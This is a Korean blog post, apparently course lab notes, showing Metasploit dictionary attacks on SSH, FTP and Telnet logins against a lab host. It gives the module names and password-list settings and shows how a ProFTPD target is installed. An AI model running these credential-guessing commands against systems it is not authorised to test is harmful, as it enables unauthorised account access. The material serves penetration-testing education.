Metasploit - 05. dictionary attack
by jennysgapdictionary attack (bruteforce)
# msfconsole
msf> search ssh_version
msf> use auxiliary/scanner/ssh/ssh_version
msf> show options
msf> set RHOSTS 192.168.3.220
msf> set THREADS 256 속도 (Linux인 경우 256가 Max, Windows는 16이 Max)
msf> show options
msf> run
msf> back
msf> search ssh_login (Password cracking)
msf> use auxiliary/scanner/ssh/ssh_login
* Dictionary Attack 시 사전 파일이 필요함.
# cd /usr/share/w3af/w3af/core/controllers/bruteforce/
# more users.txt
이 파일들은 수정하지말고 따로 파일을 새로 만들어서 실습할 예정
# vi /root/users.txt
# vi /root/passwords.txt
dictionary를 만드는 유틸리티가 있는데, 그것을 사용하면 부하로 컴퓨터가 죽음. 그러니 사용하지 마세요!!!!!
그냥 구글링하면 20만개 들어있는 dictionary파일이 있음 그것을 다운받으면 됨
msf> show options
msf> set RHOSTS 192.168.3.220
msf> set THREADS 256
msf> set PASS_FILE /root/passwords.txt
msf> set USER_FILE /root/users.txt
msf> set STOP_ON_SUCCESS true (패스워드 검색 시 1개 계정이 만족되면 정지)
msf> show options
msf> run
* Dictionary Attack : Password cracking 공격 시 사전식으로 구성 된 파일을 이용하여 대입하는 방법
> 장점 : 사전 내 존재하는 패스워드 일 경우 빠르게 찾을 수 있음.
> 단점 : 사전 내 존재하지 않는 패스워드일 경우 패스워드 찾기 불가.
* Bruteforce Attack : Password cracking 공격 시 임의 대입법을 사용
> 장점 : 반드시 패스워드 정보가 출력 됨 (입력 제한 없을 경우)
> 단점 : 시간이 오래 걸림.
[예제문제]
> ftp_login 도구를 사용하여 패스워드 찾기
[CentOS]
proftpd 사이트로 ftp 다운받기
# wget ftp://ftp.proftpd.org/distrib/source/proftpd-1.3.5b.tar.gz
# tar zxvf proftpd-1.3.5b.tar.gz
# cd proftpd-1.3.5b
# ./configure
# make
# make install
# cd /usr/local/sbin
# ls
# vi /usr/local/etc/proftpd.conf
group 을 nobody로 설정
# useradd nobody
# proftpd
# ps -ef | grep proftpd
# yum list telnet
# yum install telnet
> telnet_login 도구를 사용하여 패스워드 찾기
[Kali]
msf> search ftp_login
msf> use auxiliary/scanner/ftp/ftp_login
msf> show options
msf> set RHOSTS 192.168.3.220
msf> set STOP_ON_SUCCESS yes
msf> set USER_FILE /root/users.txt
msf> set PASS_FILE /root/passwords.txt
msf> set THREADS 256
msf> run
msf> search telnet_login
msf> use auxiliary/scanner/telnet/telnet_login
msf> set RHOSTS 192.168.3.220
msf> set STOP_ON_SUCCESS yes
msf> set USER_FILE /root/users.txt
msf> set PASS_FILE /root/passwords.txt
msf> set THREADS 256
msf> run
'BOX' 카테고리의 다른 글
| Metasploit - 07. 공격 타겟 스캐닝 (db_nmap) (0) | 2017.01.11 |
|---|---|
| Metasploit - 06. 정보 수집 (0) | 2017.01.09 |
| Metasploit - 04. Application Attack (1) | 2017.01.08 |
| Metasploit - 03. 메타스플로잇 사용법 (Exploit Tools) (0) | 2017.01.07 |
| Metasploit - 02. 메타스플로잇 사용법 (Scanning) (0) | 2017.01.06 |
블로그의 정보
jennysgap
jennysgap